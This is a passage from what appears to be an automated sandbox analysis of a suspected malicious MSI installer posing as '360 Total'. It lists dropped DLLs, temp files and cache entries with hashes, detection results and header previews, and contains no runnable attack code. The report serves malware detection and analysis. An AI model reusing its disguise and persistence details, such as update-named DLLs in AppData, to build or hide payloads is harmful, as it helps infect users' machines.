Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

C:\Config.Msi\3b3ac8.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1207
Entropy (8bit):	5.672382998413775
Encrypted:	false
SSDEEP:	24:igyI269VE6jIMaI3I4iItRpU/FPPiNiDDhiSrokfXLK:iBO99jhaxt+b8PPiNiDD8Sr2
MD5:	91E4F0F909BEA4B573874BB2F6D426FE
SHA1:	242121D2777E3E13D634AB7EBE94275E6CD7D20A
SHA-256:	37B986F2829394101CA16C5FC5E52E09C4D3DB931C38C191A119624AAB0C6524
SHA-512:	7C4089163E0A9843202F5E01C265B26EC09C492CE856E880581B002FEE4217A3BCF567E6C2532354F9B5B8FD7B691ABD2980CF4958F1BC5665F4708D06C57ABB
Malicious:	false
Preview:	...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@........CreateFolders..Creating folders..Folder: [1]#.7.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..).C:\Users\user\AppData\Local\sharepoint\....5.C:\Users\user\AppData\Local\sharepoint\360total.dll....WriteRegistryValues..Writing system registry

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	69993
Entropy (8bit):	7.99584879649948
Encrypted:	true
SSDEEP:	1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
MD5:	29F65BA8E88C063813CC50A4EA544E93
SHA1:	05A7040D5C127E68C25D81CC51271FFB8BEF3568
SHA-256:	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
SHA-512:	E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
Malicious:	false
Preview:	MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[I.hOB."..rK.RQ..}f..f...}....9.\|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..\|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..\|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1398
Entropy (8bit):	7.676048742462893
Encrypted:	false
SSDEEP:	24:ujsZPSIPSUcnA3/46giyfV4Hxk7P3Gus6acCQ4CXmW5mOgs:ujul2nQ4XfVkk7P3g6dB42mVs
MD5:	E94FB54871208C00DF70F708AC47085B
SHA1:	4EFC31460C619ECAE59C1BCE2C008036D94C84B8
SHA-256:	7B9D553E1C92CB6E8803E137F4F287D4363757F5D44B37D52F9FCA22FB97DF86
SHA-512:	2E15B76E16264ABB9F5EF417752A1CBB75F29C11F96AC7D73793172BD0864DB65F2D2B7BE0F16BBBE686068F0C368815525F1E39DB5A0D6CA3AB18BE6923B898
Malicious:	false
Preview:	0..r0..Z.......vS..uFH....JH:N.0....H........0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450...200318000000Z..450318000000Z0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450.."0....H.............0.........-.0.z.=.r.:K..a....g.7..~.....C..E..cW]....%..h.K..K.J...j..a'..D...?".O.....(..].Y.......,.3$.P:A..{.M.X8.........,..C...t...{.3..Yk....Z.{..U......L...u.o.a.tD....t..h.l&>.......0....\|U..p\$x %.gg...N4.kp..8...........;.gC....t./.....7=gl.E\.a.A.....w.FGs.....+....X.W..Z..%....r=....;D.&.........E.......Bng~B.qb...`.d....!N+.mh...tsg1z...yn\|..~FoM..+."D...7..aW...$..1s..5WG~.:E.-.Q.....7.e...k.w....?.0.o1..@........PvtY..m.2...~...u..J.,....+B..j6..L.............:.c...$d.......B0@0...U...........0...U.......0....0...U.........F...x9...C.VP..;0...*.H.............^+.t.4D_vH(@....n..%.{...=..v...0 ..`.....x.+.2..$.RR......9n....CA}..[.]...&..tr&....=;jR.<../.{.3.E.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.136616309291395
Encrypted:	false
SSDEEP:	6:kKb7QVlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:jKlMkPlE99SNxAhUeVLVt
MD5:	C0F082B14949D466997AE888611F8F78
SHA1:	5358F585EB4C796E7CB1E02C98688FDA5AC8E00F
SHA-256:	69333A27A4F5D9FDBDD02E626FEE770AC7919820B562DC8E168CE090C5D649B3
SHA-512:	428718B331CFF72DCEE9A78F7816D0FA788BF47BD2E2D970A595FF79069894B7C83B33C84BFC9CCD0BA7AD36D31C8CB690D95CD46347DB1E635AE7754E65F7CF
Malicious:	false
Preview:	p...... .........l..Q...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	264
Entropy (8bit):	3.1580880771941966
Encrypted:	false
SSDEEP:	6:kKbx/M0cUlhPQGhipWhliK8al0GQcmqe3KQjMIo1l2L/:Dx///hQGIWzyZ3qe3KQjxoK
MD5:	5493AEC1230B0FC7DDA3F2CAFDCBD4FD
SHA1:	E6560BA695556BBF380386938912365AB6E38897
SHA-256:	89F094F12DD4F45DEA8C8025440DA21CA6809BD5E8291DD8446AFEB7EDD4D9D5
SHA-512:	FD80EAB3CDFE181F2F3B398088DB951CA8A313D26928D38C33D8B6614FEC51ECEB25CAAC7CB963C31A5D6C5C42D1367EE35945C38E871AE86043CEF288633D08
Malicious:	false
Preview:	p...... ....v......Q...(....................................................... ...............................v...h.t.t.p.:././.s.e.c.u.r.e...g.l.o.b.a.l.s.i.g.n...c.o.m./.c.a.c.e.r.t./.c.o.d.e.s.i.g.n.i.n.g.r.o.o.t.r.4.5...c.r.t...".6.2.f.a.3.3.e.5.-.5.7.6."...

C:\Users\user\AppData\Local\sharepoint\360total.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.2833336520446625
Encrypted:	false
SSDEEP:	12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
MD5:	74143402C40AC2E61E9F040A2D7E2D00
SHA1:	4053DC85BB86C47C63F96681D6A62C21CD6342A3
SHA-256:	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
SHA-512:	4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: 360total.dll.dll, Detection: malicious, Browse Filename: ad.msi, Detection: malicious, Browse
Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.2833336520446625
Encrypted:	false
SSDEEP:	12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
MD5:	74143402C40AC2E61E9F040A2D7E2D00
SHA1:	4053DC85BB86C47C63F96681D6A62C21CD6342A3
SHA-256:	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
SHA-512:	4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: 360total.dll.dll, Detection: malicious, Browse Filename: ad.msi, Detection: malicious, Browse
Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

C:\Users\user\AppData\Roaming\Custom_update\update_data.dat

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	74
Entropy (8bit):	5.956008939924043
Encrypted:	false
SSDEEP:	3:8PwjGCiWxB5WA4eW0N4Jyt:8FWHeeZ4g
MD5:	A058D3B2CA77B5DF3C7AF94BB366EA79
SHA1:	6AE7F8B88C6FDAAE06DBF15A2A9E5F7E738A2D08
SHA-256:	5A38E9C6CF4CF04EBC9E34D318CB189C3F57DDF66EAE45AA255FD6AE0F9C695E
SHA-512:	C508D041BEB661A243236D8B6A451998EAC3A382A45A97F49840865A3BC7C94566CA4F53928EBE3EC407E606F077DD1135CECD8E04B234374043203BC0D7FDF2
Malicious:	false
Preview:	.. "..D.{B...@...H...x........{#0H.3t.n..^.a...%.Zq.....3..-V..h.Tlx..

C:\Windows\Installer\MSI39EE.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ad.msi, Detection: malicious, Browse Filename: avp.msi, Detection: malicious, Browse Filename: Cheater Pro 1.6.0.msi, Detection: malicious, Browse Filename: Cheat Lab 2.7.2.msi, Detection: malicious, Browse Filename: payload.js, Detection: malicious, Browse Filename: payload.js, Detection: malicious, Browse Filename: Doc_m42_81h118103-88o62135w8623-1999q9.js, Detection: malicious, Browse Filename: avp.msi, Detection: malicious, Browse Filename: sharepoint.msi, Detection: malicious, Browse Filename: slack.msi, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3A4C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3A7C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3AAC.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3AEC.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	401018
Entropy (8bit):	6.591613084954722
Encrypted:	false
SSDEEP:	6144:+MvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1p:+MvZx0FlS68zBQSncb4ZPQTpAjZxqO1p
MD5:	F62F03096698E5262F0B2D348C26D537
SHA1:	34515951BC013398B485166FD11969A99A7797D7
SHA-256:	F0D7A54E156006E64697C88E03F7A23DF1E07079E974339B1CA6D30C5ABF54EA
SHA-512:	8540547CDC013D1F2F227190C6DC3131DE4AE464534E1D8BA8F34166296493B18A4CD13307E5FF301B1320AD3D294C5DF3DAAF0D8308D81E7B4AF377BEB7CD77
Malicious:	false
Preview:	...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}7.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}+.01:\Software\HuMaster LLC\360 Total\Version.@.......@.....@.....@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}5.C:\Users\user\AppData\Local\sharepoint\360total.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".7.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@....

C:\Windows\Installer\MSI3B6A.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	399328
Entropy (8bit):	6.589290025452677
Encrypted:	false
SSDEEP:	6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
MD5:	B9545ED17695A32FACE8C3408A6A3553
SHA1:	F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
SHA-256:	1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
SHA-512:	F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIAA9D.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	1619456
Entropy (8bit):	7.152500797895932
Encrypted:	false
SSDEEP:	49152:QZH3YuW8zBQSc0ZnSKmZKumZr7A2BQTBG:+Y90Zn0K/A2OF
MD5:	666151C11B7899A0C764ABE711D3F9B3
SHA1:	35462114E096F4D307607D713136BFE38479870D
SHA-256:	8041A15E27C785F2ADCCE9E8C643F5CC619B52E50CD36FF043D13C4089CE1CAD
SHA-512:	835FEE905D540F1E3B4D32A0645041C9ADD6EA488675A8CA99DBE571CFAAEF5781BED8C1277DD7942BE7D672945D68A1016C2AB5CB645D539E07893D69672ADC
Malicious:	false
Preview:	......................>.......................................................E.......a...............................(...)......+...,...-...........A...B...C...D...E...F...............................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)......1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5639398377969682
Encrypted:	false
SSDEEP:	48:C8PhTuRc06WXOOnT5TsmSYAErCyc9duSiCSGTR:thT1AnTl7qwCZdWC3
MD5:	F80C5CA698B670BAD025D06519EB4C0B
SHA1:	252388DC70003E5696A8EE7E7D2DEF5F5CEDC942
SHA-256:	38681C09D09C8D8AB89071E67DC126A83F60B6C7768E4FDAA75E7EC4BC96E2A9
SHA-512:	9DAE68DCA88DA2590FD8F05690E0E0EC82ABD108F54AA98117CDF78077BB0D5E89B114CC05350EEC8019775AEE7BA27381B5BA65B2AC03D9B16E31D2D5E98A30
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF0C3825C8A6AE7DC2.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5639398377969682
Encrypted:	false
SSDEEP:	48:C8PhTuRc06WXOOnT5TsmSYAErCyc9duSiCSGTR:thT1AnTl7qwCZdWC3
MD5:	F80C5CA698B670BAD025D06519EB4C0B
SHA1:	252388DC70003E5696A8EE7E7D2DEF5F5CEDC942
SHA-256:	38681C09D09C8D8AB89071E67DC126A83F60B6C7768E4FDAA75E7EC4BC96E2A9
SHA-512:	9DAE68DCA88DA2590FD8F05690E0E0EC82ABD108F54AA98117CDF78077BB0D5E89B114CC05350EEC8019775AEE7BA27381B5BA65B2AC03D9B16E31D2D5E98A30
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF1B4ED7FDA427B494.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF22CBD4461B033FB8.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2534735334549778
Encrypted:	false
SSDEEP:	48:SmLudNvGFXOtT5EsmSYAErCyc9duSiCSGTR:9LlwTi7qwCZdWC3
MD5:	4D10AEDC71EEBE654E03BF57E454F052
SHA1:	AAF0ADA9787825045DCD6B31D845667490894829
SHA-256:	30F44CFE6AEE1C2DC531D3B731FFB7E0A7C6DBEA7DF0559866D4C6ED3E70742E
SHA-512:	B80D01FEDA9E9DD7CEAC9DEC496718C7734BE37EC89D1BFA727D35B4C999DDF9C06F740472D8B0D18972BA08D6945E80B353476DC9ED357E6EC660A9BF92325E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3025BC11E5C97B03.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2534735334549778
Encrypted:	false
SSDEEP:	48:SmLudNvGFXOtT5EsmSYAErCyc9duSiCSGTR:9LlwTi7qwCZdWC3
